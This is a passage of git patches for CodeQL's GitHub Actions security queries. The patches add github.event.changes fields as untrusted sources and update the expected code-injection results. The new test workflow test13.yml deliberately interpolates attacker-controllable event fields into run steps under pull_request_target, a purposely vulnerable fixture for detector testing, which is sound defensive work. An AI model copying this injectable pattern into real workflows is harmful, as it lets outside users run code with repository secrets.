a8a194c52ba..ecde4c83b20 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.53 +version: 0.1.54 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index e4cb8969649..cddb4f61bf6 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.53 +version: 0.1.54 groups: [actions, queries] suites: codeql-suites extractor: javascript From 16f1a53584a63b8c101a25b91fe5ac1eb09a0ec0 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 25 Sep 2024 18:21:54 +0200 Subject: [PATCH 0540/1267] Add new sources for github.event.changes --- ql/lib/ext/config/context_event_map.yml | 14 ++++++++++++++ .../ext/config/untrusted_event_properties.yml | 4 ++++ .../CWE-094/.github/workflows/test13.yml | 14 ++++++++++++++ .../CWE-094/CodeInjectionCritical.expected | 19 +++++++++++++++++++ .../CWE-094/CodeInjectionMedium.expected | 14 ++++++++++++++ 5 files changed, 65 insertions(+) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/test13.yml diff --git a/ql/lib/ext/config/context_event_map.yml b/ql/lib/ext/config/context_event_map.yml index e09dab14f2b..4c2451b5ab8 100644 --- a/ql/lib/ext/config/context_event_map.yml +++ b/ql/lib/ext/config/context_event_map.yml @@ -4,34 +4,47 @@ extensions: extensible: contextTriggerDataModel data: - ["commit_comment", "github.event.comment"] + - ["commit_comment", "github.event.changes"] - ["discussion", "github.event.discussion"] + - ["discussion", "github.event.changes"] - ["discussion_comment", "github.event.comment"] - ["discussion_comment", "github.event.discussion"] + - ["discussion_comment", "github.event.changes"] - ["issues", "github.event.issue"] + - ["issues", "github.event.changes"] - ["issue_comment", "github.event.issue"] - ["issue_comment", "github.event.comment"] + - ["issue_comment", "github.event.changes"] - ["gollum", "github.event.pages"] + - ["gollum", "github.event.changes"] - ["merge_group", "github.event.merge_group"] - ["pull_request", "github.event.pull_request"] - ["pull_request", "github.head_ref"] + - ["pull_request", "github.event.changes"] - ["pull_request_comment", "github.event.comment"] - ["pull_request_comment", "github.event.pull_request"] - ["pull_request_comment", "github.head_ref"] + - ["pull_request_comment", "github.event.changes"] - ["pull_request_review", "github.event.pull_request"] - ["pull_request_review", "github.event.review"] - ["pull_request_review", "github.head_ref"] + - ["pull_request_review", "github.event.changes"] - ["pull_request_review_comment", "github.event.comment"] - ["pull_request_review_comment", "github.event.pull_request"] - ["pull_request_review_comment", "github.event.review"] - ["pull_request_review_comment", "github.head_ref"] + - ["pull_request_review_comment", "github.event.changes"] - ["pull_request_target", "github.event.pull_request"] - ["pull_request_target", "github.head_ref"] + - ["pull_request_target", "github.event.changes"] - ["push", "github.event.commits"] - ["push", "github.event.head_commit"] + - ["push", "github.event.changes"] - ["repository_dispatch", "github.event.client_payload"] - ["workflow_dispatch", "github.event.inputs"] - ["workflow_run", "github.event.workflow"] - ["workflow_run", "github.event.workflow_run"] + - ["workflow_run", "github.event.changes"] # workflow_call receives the same event payload as the calling workflow - ["workflow_call", "github.event.client_payload"] - ["workflow_call", "github.event.comment"] @@ -46,4 +59,5 @@ extensions: - ["workflow_call", "github.event.review"] - ["workflow_call", "github.event.workflow"] - ["workflow_call", "github.event.workflow_run"] + - ["workflow_call", "github.event.changes"] diff --git a/ql/lib/ext/config/untrusted_event_properties.yml b/ql/lib/ext/config/untrusted_event_properties.yml index 739544455da..be2e1c9c798 100644 --- a/ql/lib/ext/config/untrusted_event_properties.yml +++ b/ql/lib/ext/config/untrusted_event_properties.yml @@ -10,6 +10,7 @@ extensions: - ["github\\.event\\.pages\\[[0-9]+\\]\\.page_name", "title"] - ["github\\.event\\.pages\\[[0-9]+\\]\\.title", "title"] - ["github\\.event\\.workflow_run\\.display_title", "title"] + - ["github\\.event\\.changes\\.title\\.from", "title"] # URL - ["github\\.event\\.pull_request\\.head\\.repo\\.homepage", "url"] # TEXT @@ -25,12 +26,14 @@ extensions: - ["github\\.event\\.workflow_run\\.head_repository\\.description", "text"] - ["github\\.event\\.client_payload\\[[0-9]+\\]", "text"] - ["github\\.event\\.client_payload", "text"] + - ["github\\.event\\.changes\\.body\\.from", "title"] # BRANCH - ["github\\.event\\.pull_request\\.head\\.repo\\.default_branch", "branch"] - ["github\\.event\\.pull_request\\.head\\.ref", "branch"] - ["github\\.event\\.workflow_run\\.head_branch", "branch"] - ["github\\.event\\.workflow_run\\.pull_requests\\[[0-9]+\\]\\.head\\.ref", "branch"] - ["github\\.event\\.merge_group\\.head_ref", "branch"] + - ["github\\.event\\.changes\\.head\\.ref\\.from", "branch"] # LABEL - ["github\\.event\\.pull_request\\.head\\.label", "label"] # EMAIL @@ -79,5 +82,6 @@ extensions: - ["github\\.event\\.workflow_run\\.head_commit\\.committer", "json"] - ["github\\.event\\.workflow_run\\.head_repository", "json"] - ["github\\.event\\.workflow_run\\.pull_requests", "json"] + - ["github\\.event\\.changes", "json"] diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test13.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/test13.yml new file mode 100644 index 00000000000..1e5c7eec177 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/test13.yml @@ -0,0 +1,14 @@ +name: Pull Request Open + +on: + pull_request_target: + +jobs: + test: + runs-on: ubuntu-latest + steps: + - run: echo "${{ github.event.changes.body.from }}" + - run: echo "${{ github.event.changes.title.from }}" + - run: echo "${{ github.event.changes.head.ref.from }}" + - run: echo "${{ toJson(github.event.changes) }}" + diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected index 749d0524415..207fb3abf01 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected @@ -15,6 +15,7 @@ edges | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:27:19:27:37 | inputs.title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:23:7:30:4 | Uses Step: out [replaced] | provenance | | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:6:7:6:11 | input taint | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | provenance | | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:44:19:44:56 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | provenance | | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:45:24:45:61 | github.event.changes.title.from | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | provenance | | | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | provenance | | | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | provenance | | | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | provenance | | @@ -89,8 +90,10 @@ edges | .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | provenance | | | .github/workflows/reusable-workflow-1.yml:6:7:6:11 | input taint | .github/workflows/reusable-workflow-1.yml:36:21:36:39 | inputs.taint | provenance | | | .github/workflows/reusable-workflow-1.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | provenance | | +| .github/workflows/reusable-workflow-1.yml:45:24:45:61 | github.event.changes.title.from | .github/workflows/reusable-workflow-1.yml:66:34:66:52 | env.prev_log | provenance | | | .github/workflows/reusable-workflow-2.yml:6:7:6:11 | input taint | .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | provenance | | | .github/workflows/reusable-workflow-2.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | provenance | | +| .github/workflows/reusable-workflow-2.yml:45:24:45:61 | github.event.changes.title.from | .github/workflows/reusable-workflow-2.yml:66:34:66:52 | env.prev_log | provenance | | | .github/workflows/reusable-workflow-caller-1.yml:11:15:11:52 | github.event.pull_request.title | .github/workflows/reusable-workflow-1.yml:6:7:6:11 | input taint | provenance | | | .github/workflows/reusable-workflow-caller-2.yml:10:15:10:52 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:6:7:6:11 | input taint | provenance | | | .github/workflows/reusable-workflow-caller-3.yml:10:15:10:52 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:6:7:6:11 | input taint | provenance | | @@ -170,7 +173,9 @@ nodes | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:6:7:6:11 | input taint | semmle.label | input taint | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | semmle.label | inputs.taint | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:44:19:44:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:45:24:45:61 | github.event.changes.title.from | semmle.label | github.event.changes.title.from | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | semmle.label | env.log | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | semmle.label | env.prev_log | | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | semmle.label | Uses Step: remove_quotations [replaced] | | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | semmle.label | github.event.issue.title | | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | semmle.label | env.ISSUE_TITLE | @@ -329,11 +334,15 @@ nodes | .github/workflows/reusable-workflow-1.yml:6:7:6:11 | input taint | semmle.label | input taint | | .github/workflows/reusable-workflow-1.yml:36:21:36:39 | inputs.taint | semmle.label | inputs.taint | | .github/workflows/reusable-workflow-1.yml:44:19:44:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/reusable-workflow-1.yml:45:24:45:61 | github.event.changes.title.from | semmle.label | github.event.changes.title.from | | .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | semmle.label | env.log | +| .github/workflows/reusable-workflow-1.yml:66:34:66:52 | env.prev_log | semmle.label | env.prev_log | | .github/workflows/reusable-workflow-2.yml:6:7:6:11 | input taint | semmle.label | input taint | | .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | semmle.label | inputs.taint | | .github/workflows/reusable-workflow-2.yml:44:19:44:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/reusable-workflow-2.yml:45:24:45:61 | github.event.changes.title.from | semmle.label | github.event.changes.title.from | | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | semmle.label | env.log | +| .github/workflows/reusable-workflow-2.yml:66:34:66:52 | env.prev_log | semmle.label | env.prev_log | | .github/workflows/reusable-workflow-caller-1.yml:11:15:11:52 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/reusable-workflow-caller-2.yml:10:15:10:52 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/reusable-workflow-caller-3.yml:10:15:10:52 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | @@ -403,6 +412,10 @@ nodes | .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | semmle.label | needs.get-artifacts.outputs.pr_num | | .github/workflows/test11.yml:55:20:55:57 | needs.get-artifacts.outputs.ref | semmle.label | needs.get-artifacts.outputs.ref | | .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | semmle.label | github.event.pull_request.title \|\| "foo" | +| .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | semmle.label | github.event.changes.body.from | +| .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | semmle.label | github.event.changes.title.from | +| .github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from | semmle.label | github.event.changes.head.ref.from | +| .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | semmle.label | toJson(github.event.changes) | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | @@ -444,6 +457,7 @@ subpaths | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | .github/workflows/composite-action-caller-4.yml:14:19:14:56 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | Potential code injection in $@, which may be controlled by an external user. | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | ${{ inputs.title }} | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | .github/workflows/reusable-workflow-caller-3.yml:10:15:10:52 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | Potential code injection in $@, which may be controlled by an external user. | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | ${{ inputs.taint }} | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:44:19:44:56 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | Potential code injection in $@, which may be controlled by an external user. | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | ${{ env.log }} | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:45:24:45:61 | github.event.changes.title.from | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | Potential code injection in $@, which may be controlled by an external user. | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | ${{ env.prev_log }} | | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | ${{steps.remove_quotations.outputs.replaced}} | | .github/workflows/artifactpoisoning1.yml:27:67:27:92 | steps.pr.outputs.id | .github/workflows/artifactpoisoning1.yml:14:9:20:6 | Uses Step | .github/workflows/artifactpoisoning1.yml:27:67:27:92 | steps.pr.outputs.id | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning1.yml:27:67:27:92 | steps.pr.outputs.id | ${{ steps.pr.outputs.id }} | | .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | .github/workflows/artifactpoisoning2.yml:13:9:19:6 | Uses Step: pr | .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | ${{ steps.pr.outputs.id }} | @@ -509,6 +523,7 @@ subpaths | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | ${{ github.head_ref }} | | .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | .github/workflows/reusable-workflow-caller-2.yml:10:15:10:52 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | ${{ inputs.taint }} | | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | .github/workflows/reusable-workflow-2.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | ${{ env.log }} | +| .github/workflows/reusable-workflow-2.yml:66:34:66:52 | env.prev_log | .github/workflows/reusable-workflow-2.yml:45:24:45:61 | github.event.changes.title.from | .github/workflows/reusable-workflow-2.yml:66:34:66:52 | env.prev_log | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/reusable-workflow-2.yml:66:34:66:52 | env.prev_log | ${{ env.prev_log }} | | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | .github/workflows/self_needs.yml:16:20:16:57 | github.event['comment']['body'] | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | ${{ steps.source.outputs.value }} | | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | .github/workflows/self_needs.yml:16:20:16:57 | github.event['comment']['body'] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | ${{ needs.test1.outputs.job_output }} | | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | ${{ steps.step.outputs.value }} | @@ -537,6 +552,10 @@ subpaths | .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | .github/workflows/test11.yml:22:9:30:6 | Uses Step | .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | ${{ needs.get-artifacts.outputs.pr_num }} | | .github/workflows/test11.yml:55:20:55:57 | needs.get-artifacts.outputs.ref | .github/workflows/test11.yml:22:9:30:6 | Uses Step | .github/workflows/test11.yml:55:20:55:57 | needs.get-artifacts.outputs.ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test11.yml:55:20:55:57 | needs.get-artifacts.outputs.ref | ${{ needs.get-artifacts.outputs.ref }} | | .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | ${{ github.event.pull_request.title \|\| "foo" }} | +| .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | ${{ github.event.changes.body.from }} | +| .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | ${{ github.event.changes.title.from }} | +| .github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from | .github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from | .github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from | ${{ github.event.changes.head.ref.from }} | +| .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | ${{ toJson(github.event.changes) }} | | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | .github/workflows/untrusted_checkout1.yml:8:9:11:6 | Uses Step | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | ${{ steps.artifact.outputs.pr_number }} | | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | ${{ github.event.workflow_run.head_commit.message }} | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index 3ad4e6915d2..e5ad4688852 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected @@ -15,6 +15,7 @@ edges | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:27:19:27:37 | inputs.title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:23:7:30:4 | Uses Step: out [replaced] | provenance | | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:6:7:6:11 | input taint | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | provenance | | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:44:19:44:56 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | provenance | | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:45:24:45:61 | github.event.changes.title.from | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | provenance | | | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | provenance | | | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | provenance | | | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | provenance | | @@ -89,8 +90,10 @@ edges | .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | provenance | | | .github/workflows/reusable-workflow-1.yml:6:7:6:11 | input taint | .github/workflows/reusable-workflow-1.yml:36:21:36:39 | inputs.taint | provenance | | | .github/workflows/reusable-workflow-1.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | provenance | | +| .github/workflows/reusable-workflow-1.yml:45:24:45:61 | github.event.changes.title.from | .github/workflows/reusable-workflow-1.yml:66:34:66:52 | env.prev_log | provenance | | | .github/workflows/reusable-workflow-2.yml:6:7:6:11 | input taint | .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | provenance | | | .github/workflows/reusable-workflow-2.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | provenance | | +| .github/workflows/reusable-workflow-2.yml:45:24:45:61 | github.event.changes.title.from | .github/workflows/reusable-workflow-2.yml:66:34:66:52 | env.prev_log | provenance | | | .github/workflows/reusable-workflow-caller-1.yml:11:15:11:52 | github.event.pull_request.title | .github/workflows/reusable-workflow-1.yml:6:7:6:11 | input taint | provenance | | | .github/workflows/reusable-workflow-caller-2.yml:10:15:10:52 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:6:7:6:11 | input taint | provenance | | | .github/workflows/reusable-workflow-caller-3.yml:10:15:10:52 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:6:7:6:11 | input taint | provenance | | @@ -170,7 +173,9 @@ nodes | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:6:7:6:11 | input taint | semmle.label | input taint | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | semmle.label | inputs.taint | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:44:19:44:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:45:24:45:61 | github.event.changes.title.from | semmle.label | github.event.changes.title.from | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | semmle.label | env.log | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | semmle.label | env.prev_log | | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | semmle.label | Uses Step: remove_quotations [replaced] | | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | semmle.label | github.event.issue.title | | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | semmle.label | env.ISSUE_TITLE | @@ -329,11 +334,15 @@ nodes | .github/workflows/reusable-workflow-1.yml:6:7:6:11 | input taint | semmle.label | input taint | | .github/workflows/reusable-workflow-1.yml:36:21:36:39 | inputs.taint | semmle.label | inputs.taint | | .github/workflows/reusable-workflow-1.yml:44:19:44:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/reusable-workflow-1.yml:45:24:45:61 | github.event.changes.title.from | semmle.label | github.event.changes.title.from | | .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | semmle.label | env.log | +| .github/workflows/reusable-workflow-1.yml:66:34:66:52 | env.prev_log | semmle.label | env.prev_log | | .github/workflows/reusable-workflow-2.yml:6:7:6:11 | input taint | semmle.label | input taint | | .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | semmle.label | inputs.taint | | .github/workflows/reusable-workflow-2.yml:44:19:44:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/reusable-workflow-2.yml:45:24:45:61 | github.event.changes.title.from | semmle.label | github.event.changes.title.from | | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | semmle.label | env.log | +| .github/workflows/reusable-workflow-2.yml:66:34:66:52 | env.prev_log | semmle.label | env.prev_log | | .github/workflows/reusable-workflow-caller-1.yml:11:15:11:52 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/reusable-workflow-caller-2.yml:10:15:10:52 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/reusable-workflow-caller-3.yml:10:15:10:52 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | @@ -403,6 +412,10 @@ nodes | .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | semmle.label | needs.get-artifacts.outputs.pr_num | | .github/workflows/test11.yml:55:20:55:57 | needs.get-artifacts.outputs.ref | semmle.label | needs.get-artifacts.outputs.ref | | .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | 